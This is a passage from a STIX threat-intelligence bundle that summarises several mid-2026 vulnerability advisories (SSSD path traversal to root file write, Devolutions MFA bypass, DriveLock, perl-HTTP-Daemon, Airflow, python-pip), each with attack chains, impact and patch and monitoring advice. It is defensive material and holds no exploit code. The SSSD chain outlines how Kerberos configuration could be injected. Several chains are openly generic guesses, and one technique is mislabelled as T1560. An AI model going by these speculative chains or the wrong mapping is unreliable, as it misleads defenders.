(e.g., `/var/log/secure` or journald) for unusual privilege escalation attempts or commands executed by newly privileged users on SSSD-enrolled systems.\n",
      "published": "2026-07-07T10:18:41Z",
      "labels": [
        "linux",
        "privilege-escalation",
        "cve",
        "vulnerability"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14474"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--10101f2b-90b9-543e-a99a-06946e40e7d6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--afe7d9eb-ae16-5ce3-8638-574e2147ad88",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--906f7cd7-b1bb-556c-83aa-30569981cf46",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Steal or Forge Kerberos Tickets",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1558",
          "url": "https://attack.mitre.org/techniques/T1558"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2df1d914-664c-5750-ac2b-b04490380af1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--afe7d9eb-ae16-5ce3-8638-574e2147ad88",
      "target_ref": "attack-pattern--906f7cd7-b1bb-556c-83aa-30569981cf46"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Hijack Execution Flow",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1574",
          "url": "https://attack.mitre.org/techniques/T1574"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--68851d12-adea-5ba1-b59d-78d88a0ef7f1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--afe7d9eb-ae16-5ce3-8638-574e2147ad88",
      "target_ref": "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b337c566-bbac-5d4a-91de-cd49345ef0c3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--afe7d9eb-ae16-5ce3-8638-574e2147ad88",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--afe7d9eb-ae16-5ce3-8638-574e2147ad88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14476: SSSD AD GPO Provider Path Traversal to Root File Write and Authentication Bypass",
      "description": "## Overview\n\nA critical path traversal vulnerability, tracked as CVE-2026-14476, has been identified in the System Security Services Daemon (SSSD) AD GPO provider. This flaw resides within the `ad_gpo_extract_smb_components()` function, which fails to properly sanitize `..` sequences embedded within the `gPCFileSysPath` LDAP attribute. This oversight enables an attacker, who has already secured Active Directory GPO management privileges, to craft a malicious attribute that directs file writes outside the intended GPO cache directory. Exploitation results in the ability to write arbitrary files as the `root` user on affected systems. Specifically, on default Red Hat Enterprise Linux (RHEL) configurations with SELinux in enforcing mode, this vulnerability can be leveraged to inject malicious Kerberos configuration, ultimately leading to an authentication bypass, compromising system integrity and access controls.\n\n## Attack Chain\n\n1.  An attacker gains or already possesses valid Active Directory GPO management credentials and access.\n2.  Using their GPO management privileges, the attacker modifies the `gPCFileSysPath` LDAP attribute to include `..` path traversal sequences.\n3.  The crafted `gPCFileSysPath` attribute is designed to point to a sensitive system directory outside the normal GPO cache on the target SSSD-managed RHEL system.\n4.  When SSSD's `ad_gpo_extract_smb_components()` function processes this attribute, it inadequately sanitizes the `..` sequences, misinterpreting the attacker's intended path.\n5.  This allows the attacker to write arbitrary files with `root` privileges to a chosen location on the affected RHEL system, bypassing normal file system permissions.\n6.  The attacker injects a malicious Kerberos configuration file (e.g., within `/etc/krb5.conf.d/` or `/etc/krb5.conf`) into a directory that is processed by the system's Kerberos client.\n7.  The injected configuration manipulates Kerberos authentication parameters, potentially redirecting authentication requests or enabling compromise of Kerberos tickets.\n8.  This manipulation leads to an authentication bypass, granting the attacker unauthorized access or elevated privileges on the SSSD-managed RHEL system.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14476 grants an authenticated attacker (with AD GPO management access) the ability to achieve arbitrary file write as root on targeted Red Hat Enterprise Linux systems. This level of access allows for critical system compromise, including the injection of malicious Kerberos configurations that can lead to a full authentication bypass. The consequence is a complete compromise of system integrity, confidentiality, and availability, enabling unauthorized access to sensitive data and critical system functions. Organizations relying on SSSD for Active Directory integration on RHEL are at risk, with potential for widespread compromise if AD GPO management systems are breached.\n\n## Recommendation\n\n*   Patch CVE-2026-14476 by applying the latest security updates provided by Red Hat for SSSD to all affected Red Hat Enterprise Linux and OpenShift Container Platform installations.\n*   Review and restrict Active Directory GPO management access to only necessary administrative accounts, following the principle of least privilege.\n*   Monitor for unusual file creation or modification events in sensitive system directories (e.g., `/etc/krb5.conf`, `/etc/krb5.conf.d/`) on SSSD-managed RHEL systems.\n*   Implement host-based intrusion detection systems to alert on unexpected changes to Kerberos configuration files or attempts to write files outside standard GPO cache locations.\n",
      "published": "2026-07-07T10:19:46Z",
      "labels": [
        "path-traversal",
        "privilege-escalation",
        "authentication-bypass",
        "kerberos",
        "linux",
        "red-hat",
        "sssd",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--906f7cd7-b1bb-556c-83aa-30569981cf46",
        "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14476"
        },
        {
          "source_name": "reference",
          "url": "https://access.redhat.com/security/cve/CVE-2026-14476"
        },
        {
          "source_name": "reference",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496581"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--aa0618b8-824d-51c4-9fdd-2f6a37f56cfa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5b085f98-33f7-5b3c-8a4a-635cf46f88aa",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--5b085f98-33f7-5b3c-8a4a-635cf46f88aa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Devolutions Server: Vulnerability Allows Multi-Factor Authentication Bypass",
      "description": "## Overview\n\nA significant vulnerability has been identified in Devolutions Server, an enterprise solution for managing privileged access and credentials. This flaw, rated as high severity by BSI (German Federal Office for Information Security), allows a remote, authenticated attacker to bypass multi-factor authentication (MFA) protections. The advisory, published on July 7, 2026, highlights that while an attacker must first gain initial authentication credentials, the successful exploitation of this vulnerability negates the added security layer provided by MFA. This is critical for defenders as MFA is a fundamental control against credential theft and provides a strong defense against unauthorized access to sensitive systems and data managed by Devolutions Server. Without specific details on the nature of the bypass, organizations are urged to apply vendor-provided patches immediately.\n\n## Impact\n\nThe successful exploitation of this MFA bypass vulnerability could have severe consequences for organizations utilizing Devolutions Server. An attacker who has already obtained legitimate user credentials (e.g., through phishing or credential stuffing) could then gain full access to the privileged access management system, bypassing the crucial second factor of authentication. This level of access would allow the attacker to retrieve sensitive credentials, access management tools, and potentially control critical infrastructure. The primary impact is unauthorized access, which can lead to data exfiltration, system compromise, or further lateral movement within the victim's network. The advisory does not specify observed victims or targeted sectors but emphasizes the high risk posed by this type of security bypass.\n\n## Recommendation\n\n*   Prioritize and immediately apply all available security updates from Devolutions for Devolutions Server to remediate the MFA bypass vulnerability.\n*   Review access logs for Devolutions Server for any suspicious authentication attempts that successfully bypass MFA or originate from unusual locations/IPs.\n*   Implement strict password policies and ensure robust initial authentication mechanisms to prevent initial credential compromise, as this vulnerability requires an already authenticated attacker.\n",
      "published": "2026-07-07T11:08:46Z",
      "labels": [
        "defense-evasion",
        "vulnerability",
        "server"
      ],
      "object_refs": [
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2217"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ed96f110-24b2-57a9-9d47-07e22e0fd50f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6eeaa40f-9075-5519-8459-d3e53d168e3d",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e6435b03-bff4-5f39-9c26-2feaf1b87793",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6eeaa40f-9075-5519-8459-d3e53d168e3d",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Cloud Storage",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1530",
          "url": "https://attack.mitre.org/techniques/T1530"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a032bdf4-3331-585b-8b21-e1f0a930912c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6eeaa40f-9075-5519-8459-d3e53d168e3d",
      "target_ref": "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--6eeaa40f-9075-5519-8459-d3e53d168e3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "DriveLock On-Premise and Cloud: Multiple Vulnerabilities",
      "description": "## Overview\n\nThe German Federal Office for Information Security (BSI) has released an advisory concerning multiple critical vulnerabilities affecting both DriveLock On-Premise and DriveLock Cloud solutions. These security flaws can be exploited by an authenticated, remote attacker. The discovered weaknesses allow for information disclosure, arbitrary code execution (ACE), and privilege escalation within affected DriveLock environments. This means that a sophisticated attacker, once authenticated, could potentially gain full control over the system, access sensitive data, or elevate their permissions to administrative levels. Given DriveLock's role in endpoint protection and data encryption, the exploitation of these vulnerabilities could severely compromise an organization's security posture, leading to data breaches, system compromise, and significant operational disruption. It is crucial for organizations utilizing DriveLock products to address these vulnerabilities promptly.\n\n## Attack Chain\n\nThe provided advisory describes multiple vulnerabilities and their potential impact but does not detail a specific, observed attack chain or the sequence of exploitation steps. An authenticated, remote attacker could leverage these vulnerabilities as follows:\n\n1.  **Initial Access / Authentication**: An attacker first gains authenticated access to a DriveLock On-Premise or Cloud instance, potentially through compromised credentials or other means not detailed in the advisory.\n2.  **Vulnerability Identification**: The attacker identifies and targets specific vulnerabilities within the DriveLock application, leveraging their authenticated session.\n3.  **Information Disclosure**: Exploits are triggered to disclose sensitive information, potentially revealing configuration details, user data, or system internals.\n4.  **Arbitrary Code Execution**: Leveraging another vulnerability, the attacker executes arbitrary code on the underlying server or endpoint, using the privileges of the DriveLock service.\n5.  **Privilege Escalation**: The executed arbitrary code or a separate vulnerability allows the attacker to escalate their privileges within the DriveLock environment or the host system, potentially gaining administrative control.\n6.  **Persistence / Lateral Movement**: With elevated privileges, the attacker could establish persistence or move laterally within the network, targeting other systems or data.\n7.  **Impact Fulfillment**: The attacker achieves their final objective, which could include further data exfiltration, deployment of additional malware, or complete system compromise.\n\n## Impact\n\nSuccessful exploitation of these vulnerabilities could lead to severe consequences for organizations relying on DriveLock for endpoint security and data protection. Attackers could gain unauthorized access to sensitive data via information disclosure flaws, leading to significant data breaches. The ability to execute arbitrary code allows attackers to deploy malware, ransomware, or other malicious payloads directly onto endpoints or server infrastructure managed by DriveLock. Furthermore, privilege escalation could grant attackers full administrative control, enabling them to bypass security controls, tamper with critical systems, and potentially move laterally across the network, compromising an entire organizational infrastructure. The advisory does not specify observed victim counts or targeted sectors, but given DriveLock's broad enterprise usage, any sector is potentially at risk.\n\n## Recommendation\n\n*   Refer to the official BSI security advisory WID-SEC-2026-2220 for comprehensive details on affected versions and necessary patches.\n*   Apply all available security updates and patches for DriveLock On-Premise and DriveLock Cloud as soon as they are released by the vendor to address the reported vulnerabilities.\n*   Implement robust authentication practices, including multi-factor authentication, to mitigate the risk of an authenticated attacker exploiting these vulnerabilities.\n",
      "published": "2026-07-07T11:22:12Z",
      "labels": [
        "vulnerability",
        "privilege-escalation",
        "rce",
        "information-disclosure",
        "drivelock",
        "cert-bund"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2220"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cd3d3c68-7430-5084-9281-ca3e09435111",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cf6f4153-5d3e-51e6-9da2-2ab77a9f6ab7",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d8437c4a-b5f8-59dd-92db-fd0fc64da184",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cf6f4153-5d3e-51e6-9da2-2ab77a9f6ab7",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--cf6f4153-5d3e-51e6-9da2-2ab77a9f6ab7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Red Hat Enterprise Linux (perl-HTTP-Daemon): Remote Code Execution Vulnerability",
      "description": "## Overview\n\nA recent advisory from Germany's Federal Office for Information Security (BSI) via CERT-Bund highlights a critical vulnerability within the `perl-HTTP-Daemon` component of Red Hat Enterprise Linux. This flaw, detailed in WID-SEC-2026-2218, allows a remote, unauthenticated attacker to execute arbitrary program code with the privileges of the affected service. The exploitation of this vulnerability could lead to significant system compromise, granting attackers full control over the compromised Red Hat Enterprise Linux system. While specific in-the-wild exploitation has not been confirmed, the nature of remote code execution makes immediate patching essential for all organizations utilizing affected Red Hat systems. The advisory emphasizes the severity of this vulnerability, urging prompt action to prevent potential breaches.\n\n## Attack Chain\n\n1. The attacker identifies a publicly accessible Red Hat Enterprise Linux system running the vulnerable `perl-HTTP-Daemon` service.\n2. The attacker crafts and sends a malicious HTTP request to the vulnerable service endpoint, designed to trigger the flaw.\n3. The `perl-HTTP-Daemon` component processes the malformed request, leading to the execution of attacker-controlled code due to the vulnerability.\n4. Arbitrary commands are executed on the compromised system with the privileges of the `perl-HTTP-Daemon` service.\n5. The attacker establishes persistence mechanisms or escalates privileges to gain broader access and control over the Red Hat Enterprise Linux host.\n6. The attacker proceeds with further objectives such as data exfiltration, lateral movement within the network, or deployment of additional malicious payloads.\n\n## Impact\n\nIf successfully exploited, this vulnerability allows a remote, unauthenticated attacker to execute arbitrary code with the privileges of the `perl-HTTP-Daemon` service. This can lead to a complete compromise of the affected Red Hat Enterprise Linux system, including data theft, unauthorized modification of system configurations, or deployment of ransomware. The advisory does not specify observed victims or targeted sectors but highlights the potential for severe operational disruption and data loss.\n\n## Recommendation\n\n*   Apply the latest security updates for Red Hat Enterprise Linux that address the `perl-HTTP-Daemon` vulnerability immediately, referencing the official Red Hat security advisories.\n*   Review systems running `perl-HTTP-Daemon` for signs of compromise, focusing on unexpected process creation or outbound connections from the service account.\n",
      "published": "2026-07-07T11:23:09Z",
      "labels": [
        "redhat",
        "linux",
        "vulnerability",
        "rce",
        "perl",
        "webserver"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2218"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1eedd55b-338d-597f-ae4d-ee7ba38ce3fc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4d89dadc-a49a-50e7-a50a-45a164f1c175",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ec5d08fd-acdd-5f39-9c56-f8373ba5ed2d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4d89dadc-a49a-50e7-a50a-45a164f1c175",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4d89dadc-a49a-50e7-a50a-45a164f1c175",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Apache Airflow: Multiple Vulnerabilities",
      "description": "## Overview\n\nThe BSI (Bundesamt für Sicherheit in der Informationstechnik) has published an advisory regarding multiple vulnerabilities within Apache Airflow, a popular open-source platform used for programmatically authoring, scheduling, and monitoring workflows. These vulnerabilities, if exploited, could allow an unauthenticated attacker to execute arbitrary program code on the underlying system, bypass existing security precautions designed to protect the platform, and disclose sensitive information stored or processed by Airflow. The advisory, published on July 7, 2026, highlights the potential for severe impact, including full system compromise of the server hosting Airflow or unauthorized access to critical data and workflows managed by affected Apache Airflow environments. This general alert signifies discovered weaknesses that require immediate attention from administrators responsible for Airflow deployments.\n\n## Attack Chain\n\n1.  An attacker identifies a vulnerable Apache Airflow instance accessible via the network or through other means of initial access.\n2.  The attacker leverages one or more of the identified vulnerabilities by sending a specially crafted request or input to the Apache Airflow application.\n3.  Successful exploitation leads to initial unauthorized execution of arbitrary program code within the context of the Apache Airflow process.\n4.  The attacker utilizes the gained code execution to bypass existing security controls and precautions within the Airflow environment or the host system.\n5.  Subsequently, the attacker executes arbitrary commands, potentially escalating privileges or gaining further control over the underlying operating system.\n6.  This compromise enables the attacker to access, modify, or exfiltrate sensitive data, workflow definitions, or credentials processed by or stored within the Airflow environment.\n\n## Impact\n\nSuccessful exploitation of these vulnerabilities could result in significant operational disruption and data breaches. An attacker capable of executing arbitrary code could completely compromise the server hosting Apache Airflow, leading to data manipulation, deletion, or exfiltration of sensitive workflow definitions, credentials, and processed data. Bypassing security precautions could grant unauthorized access to critical functions, allowing for workflow tampering or resource abuse. Information disclosure could expose proprietary business logic, intellectual property, or confidential user data, severely impacting organizational integrity and compliance. The advisory does not specify observed victims or targeted sectors but warns all Airflow users.\n\n## Recommendation\n\n*   Patch affected Apache Airflow installations immediately by upgrading to the latest secure version to mitigate the identified vulnerabilities.\n*   Configure comprehensive logging for Apache Airflow application and system logs to capture detailed activity, which can assist in detecting exploitation attempts.\n*   Implement network segmentation to restrict access to Apache Airflow instances, limiting exposure to potential attackers.\n",
      "published": "2026-07-07T11:34:35Z",
      "labels": [
        "vulnerability",
        "apache",
        "airflow",
        "code-execution"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2223"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c4174134-faf3-58cc-b83c-239d899bcb70",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f7795ce3-7a35-5a94-bc90-5d5d0401bca0",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dd4c673f-8b7d-5c2f-a73c-2d5af6931568",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Stored Data Manipulation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1560",
          "url": "https://attack.mitre.org/techniques/T1560"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d96a4613-dfc5-5018-8a37-1bbcc346b9e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f7795ce3-7a35-5a94-bc90-5d5d0401bca0",
      "target_ref": "attack-pattern--dd4c673f-8b7d-5c2f-a73c-2d5af6931568"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f7795ce3-7a35-5a94-bc90-5d5d0401bca0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Red Hat Enterprise Linux (python-pip) Vulnerability Allows Remote Code Execution",
      "description": "## Overview\n\nA critical vulnerability has been identified in Red Hat Enterprise Linux, specifically affecting the `python-pip` component. This flaw allows a remote, authenticated attacker to overwrite arbitrary files on the system, which can subsequently lead to the execution of arbitrary code. This means that if an attacker gains legitimate or compromised credentials to a vulnerable RHEL system, they can leverage this vulnerability to gain full control over the affected machine. The ability to overwrite arbitrary files opens the door for various sophisticated attacks, including privilege escalation, persistence, and complete system compromise. Organizations running Red Hat Enterprise Linux with the `python-pip` component are at risk, as this vulnerability provides a direct path to unconstrained code execution for an authenticated attacker.\n\n## Attack Chain\n\n1.  **Initial Access**: An attacker obtains valid authentication credentials to a Red Hat Enterprise Linux system running the vulnerable `python-pip` component, either through compromised accounts or legitimate access.\n2.  **Vulnerability Exploitation**: The authenticated attacker exploits the vulnerability within `python-pip` by issuing specially crafted commands or package installation requests.\n3.  **Arbitrary File Overwrite**: Leveraging the flaw, the attacker overwrites a critical system file, a configuration file for a high-privilege service, or a Python module loaded by other applications.\n4.  **Malicious Code Injection**: The attacker replaces the legitimate content of the overwritten file with their own malicious code or configuration designed to execute commands.\n5.  **Achieve Code Execution**: When the modified system component or service is executed or reloaded, the attacker's injected code runs, potentially with elevated privileges.\n6.  **Post-Exploitation**: The attacker establishes persistence, performs privilege escalation if not already achieved, and proceeds with further objectives such as data exfiltration, lateral movement, or deploying additional malware.\n\n## Impact\n\nSuccessful exploitation of this vulnerability grants a remote authenticated attacker the ability to overwrite arbitrary files and achieve arbitrary code execution on the affected Red Hat Enterprise Linux system. This leads to complete system compromise, allowing the attacker to steal sensitive data, disrupt services, install backdoors, or pivot to other systems within the network. While specific victim counts or targeted sectors are not available in the advisory, any organization utilizing Red Hat Enterprise Linux with the `python-pip` component is at risk of severe operational disruption and data breaches.\n\n## Recommendation\n\n*   Apply available security updates from Red Hat for the `python-pip` component in Red Hat Enterprise Linux immediately to address this vulnerability.\n*   Implement robust monitoring for unauthorized file modifications, particularly within system-critical directories (e.g., `/etc`, `/usr/local/bin`) and Python library paths, as this is the core mechanism of the exploitation described in this brief.\n*   Audit authenticated user activity for unusual `pip` commands, package installations from untrusted sources, or attempts to modify system files that align with the attack chain.\n",
      "published": "2026-07-07T11:35:35Z",
      "labels": [
        "vulnerability-exploitation",
        "linux",
        "code-execution"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--dd4c673f-8b7d-5c2f-a73c-2d5af6931568"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2222"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
